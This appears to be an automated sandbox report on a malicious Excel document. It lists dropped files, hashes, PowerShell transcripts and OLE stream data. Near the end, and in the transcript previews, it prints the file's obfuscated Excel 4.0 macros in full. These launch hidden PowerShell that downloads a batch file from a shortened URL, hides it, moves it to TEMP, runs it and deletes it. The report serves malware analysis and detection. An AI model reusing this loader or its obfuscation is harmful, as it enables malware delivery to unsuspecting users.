                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aq5p0uwt.qi0.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0jio5ua.cxb.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwuq0g54.tbl.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2c2vjrm.bvc.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwjtcat4.1zn.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ytah55c4.ugm.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0rptuzf.wgh.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Wed Nov 18 09:56:47 2020, atime=Wed Nov 18 09:56:47 2020, length=12288, window=hide
                                                              Category:dropped
                                                              Size (bytes):904
                                                              Entropy (8bit):4.63842721857316
                                                              Encrypted:false
                                                              SSDEEP:12:81z00XUGuElPCH2Ygz10n/Vh+WrjAZ/2bDDLC5Lu4t2Y+xIBjKZm:81z0fgzq/FAZiDq87aB6m
                                                              MD5:28B10C6E244BD0AF3F0063F917556FB1
                                                              SHA1:DE0DC686F2DCDEE17C7E9426337E9C74094D74E8
                                                              SHA-256:8D052F0DBE66F8456FC37AB2BB6D39B30CF03522685787D571C1FF092B576A9E
                                                              SHA-512:556B6CC00CA06216F4FFB69A27A4C5E92BD0771DF4431FD9CA7DFCCE789DDF7FFE32104465E5351CC81C07DE8253F116830E16B43D5991861DD632A3472565F4
                                                              Malicious:false
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SIN029088.xls.LNK
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Wed Nov 18 09:56:47 2020, atime=Wed Nov 18 09:56:47 2020, length=76288, window=hide
                                                              Category:dropped
                                                              Size (bytes):2100
                                                              Entropy (8bit):4.668662461907179
                                                              Encrypted:false
                                                              SSDEEP:24:8cMhKxgzsT8AjFWDLl7aB6mycMhKxgzsT8AjFWDLl7aB6m:8cMhWrT7jioB6pcMhWrT7jioB6
                                                              MD5:B5F241B96BDE381C497109FED3FE4B99
                                                              SHA1:0E9ADB0D406153B497BA8CD4CC0FAE9E34637B99
                                                              SHA-256:802907F45947C47AC0C4B67A79BE65E6F4F0FA369CDB7E72E7E4012BD79F0B69
                                                              SHA-512:CA500CB31706572993871B0D4B704D6FBFF1EAB7760531F3D7E343281D45CB1A845A294F991511042564D58A388E7759A421EF4481E24A9BA0C9FE4AF2FB8F1C
                                                              Malicious:true
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):92
                                                              Entropy (8bit):4.297473033964455
                                                              Encrypted:false
                                                              SSDEEP:3:oyBVomMjB0nMUubnMUmMjB0nMUv:dj6aMlMmaM2
                                                              MD5:563FD3352B60431A1BD337BB9BB7CD2F
                                                              SHA1:9F9DAF862930148695FC35016394908054FB6269
                                                              SHA-256:58BA83FF777990C409468F153B678CC69252F3798CE3DCF27B472E6FD782A8C8
                                                              SHA-512:1EDF09AB4D9437D62CA2F173F24913E61300977B267F6D0D3C65442C25C50D4CAA122E26DB3586868220B4E1C4EF21D62E97B895DF22905777FC0FFD5D257F0D
                                                              Malicious:false
                                                              Preview: Desktop.LNK=0..[xls]..SIN029088.xls.LNK=0..SIN029088.xls.LNK=0..[xls]..SIN029088.xls.LNK=0..
                                                              C:\Users\user\Desktop\95A10000
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:Applesoft BASIC program data, first line number 16
                                                              Category:dropped
                                                              Size (bytes):101260
                                                              Entropy (8bit):6.262270720499872
                                                              Encrypted:false
                                                              SSDEEP:3072:TMk3hbdlylKsgqopeJBWhZFGkE+cL2Nd+b4dEEwrTxJJJcMk3hbdlylKsgqopeJD:wk3hbdlylKsgqopeJBWhZFVE+W2Nd+bt
                                                              MD5:1B87A31A2BF604D932E75E952D2826C6
                                                              SHA1:0D7DAC61502F6F7594728BDD6FDF85E1AC62D78D
                                                              SHA-256:D3C005983BD1F85C63E09FE6F215D8D1A6637E2DFE45B04889428A7F7CDB2CDB
                                                              SHA-512:B8FA71B309A00FCD63B541B63F31F1E04A403B3DE996C965C970B657900DB9DF489FAE1BFE47D20910498D66501A73CA4088B0DFCC983249F309E41DA82EC862
                                                              Malicious:false
                                                              C:\Users\user\Documents\20201118\PowerShell_transcript.302494.3yVd2HwL.20201118025651.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3218
                                                              Entropy (8bit):5.389217953073274
                                                              Encrypted:false
                                                              SSDEEP:96:BZ6hAZNMqDo1Zz3ZphAZNMqDo1ZxavAvAbTZL:X44J
                                                              MD5:852104B539084EF1E3DDF93174181EC3
                                                              SHA1:4BF72B31FA3F9759FA84FCC15813395ED902D948
                                                              SHA-256:2947826221147697906DE98F2303FE6B488F50B23CB8AE31AA77015FBD0CEDAF
                                                              SHA-512:4E2222C3D6E9279783D13928F8779C8C8C871670C2B8D6B76C5C945DB475898C23BD2BA589C6C758170A8CCAD2DB96E3D9E5F0DC103C57B88BB7E80FE2C87B1F
                                                              Malicious:false
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201118025721..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 3; Move-Item pd.bat -Destination $e`nV:T`EMP..Process ID: 800..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201118025722..**********************..PS>stARt`-slE`Ep 3; Move-Item pd.bat -Destination $e`nV:T`EMP..**********************..Windows PowerShell transcript start..Start time: 20201118025814..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Hos
                                                              C:\Users\user\Documents\20201118\PowerShell_transcript.302494.A7RtmgRr.20201118025652.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators
                                                              Category:dropped
                                                              Size (bytes):5335
                                                              Entropy (8bit):5.32619158796694
                                                              Encrypted:false
                                                              SSDEEP:96:BZPLhAZNXqDo1ZaZ7hAZNXqDo1ZnxUUdZ3hAZNXqDo1ZY/viufuf+MZV:uviufuf+o
                                                              MD5:75CC7A2D78AAFEBA31E56FE8936EB69F
                                                              SHA1:C6C4FE38ABBE331D81B745B6DC69237BA875602F
                                                              SHA-256:1D4DD3C7EAFDC8613A47A91F62532CA6F9707FEC22DE19C046005A8781C8EAD6
                                                              SHA-512:A0A7024F1AA4AFD6FE1129769F495E73353ED79C7DE91811F6B0F3DABF9E9A53F6D057AF42DB7724AD9AD468CB8EAAE6FF3533B59D62D65B0BB98D9614A01DC4
                                                              Malicious:false
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201118025728..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 7;cd $e`nV:T`EMP; ./pd.bat..Process ID: 4824..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201118025728..**********************..PS>stARt`-slE`Ep 7;cd $e`nV:T`EMP; ./pd.bat..**********************..Windows PowerShell transcript start..Start time: 20201118025823..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stAR
                                                              C:\Users\user\Documents\20201118\PowerShell_transcript.302494.O2kFUmpi.20201118025653.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1055
                                                              Entropy (8bit):5.265983328597185
                                                              Encrypted:false
                                                              SSDEEP:24:BxSASxvBn/IZx2DOXBBWYHjeTKKjX4CIym1ZJXkeDnxSAZA:BZOvhAZoOaYqDYB1ZdDZZA
                                                              MD5:0BA450F0ECC741B34BE32434991CFAD2
                                                              SHA1:0A5686322206F585E316915D8B9F965DFC971EDE
                                                              SHA-256:0D83AB322321431105AAC79FDA38AB8AEF918F0CCD70DD2F61395A108B24B881
                                                              SHA-512:1D14E0DEF00F01DCBCC97D24299841BC7CE1AAC799E076D5E42FAD923B8D8BD23BB9051F16DECAC30B1F1AF7CBA0E36BE68DE82B89C2C92F20E7A6FEA4AF31C3
                                                              Malicious:false
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201118025729..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y252oqq3','pd.bat')..Process ID: 5344..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201118025730..**********************..PS>(nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y252oqq3','pd.bat')..**********************..Command start time: 20201118025820..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript
                                                              C:\Users\user\Documents\20201118\PowerShell_transcript.302494.YCCuFHw+.20201118025651.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):959
                                                              Entropy (8bit):5.054220270153939
                                                              Encrypted:false
                                                              SSDEEP:24:BxSAa0ixvBn/IZx2DOXJuzWQHjeTKKjX4CIym1ZJXPFJnxSAZe:BZa0evhAZoOZZQqDYB1Z5nZZe
                                                              MD5:E3A6FB50DC898FFD7885F9B485E073BC
                                                              SHA1:617B4B89C87EE55E7A974AC4DF1681B1CB9FDFB7
                                                              SHA-256:F4AC5E15B55499EB54E51F080E018EB5506D75A75DDB9778EF7AD76C3D267F2C
                                                              SHA-512:45A9E6D72412214343F92096AE301C84B7AA695035FC909D8D0D8B32E20D8493374C2BC43479D37706CD954991895A4951E54963B61DA6C54E9D4A7156FBF2EB
                                                              Malicious:false
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201118025727..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat..Process ID: 912..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201118025728..**********************..PS>stARt`-slE`Ep 1; attrib +s +h pd.bat..File not found - pd.bat..**********************..Command start time: 20201118025815..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20201118025816..**********************..
                                                              C:\Users\user\Documents\20201118\PowerShell_transcript.302494.y+93if3U.20201118025652.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):961
                                                              Entropy (8bit):5.0720039684440215
                                                              Encrypted:false
                                                              SSDEEP:24:BxSA+xvBn/IZx2DOXJYFWWWHjeTKKjX4CIym1ZJXkWYFTnxSAZ7:BZ6vhAZoOZ6RWqDYB1ZuW6zZZ7
                                                              MD5:3712DE78482853E74F6ADE8EBAA13916
                                                              SHA1:7EC98DBE2F925FE9FB85FAF035FA99DF2BE4108F
                                                              SHA-256:AC9007F7FE67755D287B8B0B03CA314038D3B1F4AD991829CD7B524EFF730B35
                                                              SHA-512:905B2DDC17D60926D70E709F7515D68F1154EA308A87ED047A2036FFD5E68DF137605F55BE955E32852169A1BA33E4251AB0B49FB34894FE5A968C1667EB9943
                                                              Malicious:false
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201118025725..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force..Process ID: 1720..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201118025726..**********************..PS>stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force..**********************..Command start time: 20201118025826..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20201118025826..**********************..
                                                              C:\Users\user\Documents\pd.bat
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:HTML document, ASCII text
                                                              Category:dropped
                                                              Size (bytes):4606
                                                              Entropy (8bit):4.92124169787845
                                                              Encrypted:false
                                                              SSDEEP:96:+fuXZjJOJvz06mJWai5hLBBDu8FeGcOsutscRtKLYQfqp:fZ1mvzmo5hLBBy8FeGcOsuqoKLVfqp
                                                              MD5:4D9C00D079A92415926144B2C8691B13
                                                              SHA1:56C897DEC2400C319B0F807578B197C3325D66B1
                                                              SHA-256:46795C4CCB8D61A2C9211EE9180F81885AC02E02980095CAECCF853CFD25873A
                                                              SHA-512:000B186FFB5E168EC7C68BA838197EB5CC4EF29C0EA9B5B7EC4CE8B200305CE9BB25683C7091437F7F962B3A90211AC9960BA1EFC67AA34628C3366BD7AAF13F
                                                              Malicious:false
                                                              Preview: <!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. [if IE]><meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'><![endif]-->.<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">.<title>TinyURL.com - shorten that long URL into a tiny URL</title>.<base href="https://tinyurl.com/">.<meta name="description" content="TinyURL.com is the original URL shortener that shortens your unwieldly links into more manageable and useable URLs.">.<meta name="keywords" content="tinyurl url save share shorten analyze">.<link rel="shortcut icon" href="https://tinyurl.com/favicon.ico" type="image/gif">. <style type="text/css">. . body {. color : Black;. background-color : #CCCCFF;. font-family : Verdana, Geneva, Arial, Helvetica, sans-serif;. }.. td {. font-size : 80%;. color : Black;. font-family : Verdana, Geneva, Arial, Hel

                                                              Static File Info

                                                              General

                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Dexter MORGAN, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sat Oct 31 02:12:40 2020, Security: 1, Author: Dexter MORGAN
                                                              Entropy (8bit):6.756732735024043
                                                              TrID:
                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                              File name:SIN029088.xls
                                                              File size:69120
                                                              MD5:483a0f4cb6a70556b34aed04f24f7962
                                                              SHA1:cbd6b0004aca06a46b4863bfbc13f444b3404483
                                                              SHA256:ccab18c2ba789320bdb50d364ce3f70a625c60c68a93ad05bbca056f9f6f821a
                                                              SHA512:6c5bfee4f94df52461a6fbf56bdd41903c866aba02b03a428db6a95dfedadec41c8912e1de21d57358fe308eaf3428ceeadc5b08ee5d3d85eb4a701a214e0ff8
                                                              SSDEEP:1536:oMnSGiysRchNXHfA1MiWhZFGkEld+Dr7FjmSb4wIE7zp0RhBv1hQz7rT01Bf:oMnSGiysRchNXHfA1MiWhZFGkEld+Dre
                                                              File Content Preview:........................;......................................................................................................................................................................................................................................

                                                              File Icon

                                                              Icon Hash:74ecd4c6c3c6c4d8

                                                              Static OLE Info

                                                              General

                                                              Document Type:OLE
                                                              Number of OLE Files:1

                                                              OLE File "SIN029088.xls"

                                                              Indicators

                                                              Has Summary Info:True
                                                              Application Name:unknown
                                                              Encrypted Document:False
                                                              Contains Word Document Stream:False
                                                              Contains Workbook/Book Stream:True
                                                              Contains PowerPoint Document Stream:False
                                                              Contains Visio Document Stream:False
                                                              Contains ObjectPool Stream:
                                                              Flash Objects Count:
                                                              Contains VBA Macros:True

                                                              Summary

                                                              Code Page:1252
                                                              Author:Dexter MORGAN
                                                              Last Saved By:Dexter MORGAN
                                                              Create Time:2020-09-20 21:17:44
                                                              Last Saved Time:2020-10-31 02:12:40
                                                              Security:1

                                                              Document Summary

                                                              Document Code Page:1252
                                                              Thumbnail Scaling Desired:False
                                                              Contains Dirty Links:False
                                                              Shared Document:False
                                                              Changed Hyperlinks:False
                                                              Application Version:1048576

                                                              Streams

                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                                                              General
                                                              Stream Path:\x5DocumentSummaryInformation
                                                              File Type:data
                                                              Stream Size:276
                                                              Entropy:3.16930549839
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00
                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 192
                                                              General
                                                              Stream Path:\x5SummaryInformation
                                                              File Type:data
                                                              Stream Size:192
                                                              Entropy:3.49624442174
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . . @ . . . . L . z . . . . @ . . . . . O + . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . .
                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 90 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 0c 00 00 00 58 00 00 00 0d 00 00 00 64 00 00 00 13 00 00 00 70 00 00 00 04 00 00 00 78 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0e 00 00 00 44 65 78 74 65 72 20 4d
                                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 66020
                                                              General
                                                              Stream Path:Workbook
                                                              File Type:Applesoft BASIC program data, first line number 16
                                                              Stream Size:66020
                                                              Entropy:6.85011092869
                                                              Base64 Encoded:True
                                                              Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . D e x t e r M O R G A N B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . # F . . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                                              Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 0d 00 00 44 65 78 74 65 72 20 4d 4f 52 47 41 4e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                              Macro 4.0 Code

                                                              "=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 stARt`-slE`Ep 3; Move-Item """"pd.bat"""" -Destination """"$e`nV:T`EMP"""""")"
                                                              "=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force"")"
                                                              "=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat"")"
                                                              "=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd.bat"""""")"
                                                              "=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').""""Invoke""""('https://tinyurl.com/y252oqq3','pd.bat')"")"
                                                              =PAUSE()

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              UDP Packets

                                                              DNS Queries

                                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
